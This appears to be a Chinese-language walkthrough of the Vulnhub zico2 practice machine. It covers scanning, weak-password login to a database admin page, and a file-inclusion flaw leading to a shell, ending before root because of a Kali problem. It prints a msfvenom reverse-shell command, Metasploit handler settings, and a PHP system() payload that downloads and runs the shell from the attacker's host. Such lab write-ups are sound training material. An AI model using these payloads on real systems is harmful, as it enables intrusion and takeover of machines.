Vulnhub靶机第九关

Vulnhub靶机 zico2
运行环境
本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运
行。
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机说明
本靶机的难度为中等。
本靶机的渗透目标为渗透进靶机,拿到root权限,并读取flag文件。
官方提供了一个提示:枚举、枚举、枚举。
不局限与桥接模式,也可以修改为net模式
确定ip后执行
Nmap -A 192.168.238.138 扫描详细信息
Vulnhub靶机第九关
访问这个ip
使用御剑扫描毛都没有,果断放弃
改用dirb
Vulnhub靶机第九关
发现登录页面
Vulnhub靶机第九关
Vulnhub靶机第九关
尝试使用弱密码admin进行登录
登录成功后发现有两条数据
点击浏览进行查看
Vulnhub靶机第九关
发现加密代码
Vulnhub靶机第九关
尝试解密得到:34kroot34 zico [email protected]
Vulnhub靶机第九关
先把账户密码放一边
新建hack.php数据库
Vulnhub靶机第九关
Vulnhub靶机第九关
内容输入<?php phpinfo();?>用于测试,利用文件包含漏洞来访问创建的hack.php
Vulnhub靶机第九关
因为 此版本存在远程代码执行漏洞
所以利用msf生成一个反向壳的shell通过文件包含漏洞执行
生成shell
msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf -o shell.elf -a x64 --platform linux LHOST=192.168.238.128 LPORT=4444
并将生产是shell.elf cp到tmp下
Vulnhub靶机第九关
监听开启
Vulnhub靶机第九关
然后利用python -m SimpleHTTPServer 80 搭建一个简易的web服务器
Vulnhub靶机第九关
Msf输入 use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set LHOST 192.168.238.128
set LPORT 4444
Run
Vulnhub靶机第九关
新建数据库
输入:<?php system("cd /tmp; wget http://192.168.238.128:80/shell.elf; chmod a+x shell.elf; ./shell.elf"); ?>
Vulnhub靶机第九关
192.168.238.138/view.php?page=…/…/…/…/…/usr/databases/shell.php 访问
Vulnhub靶机第九关
成功拿到shell
Vulnhub靶机第九关
因为kali 出问题了暂时只到这里。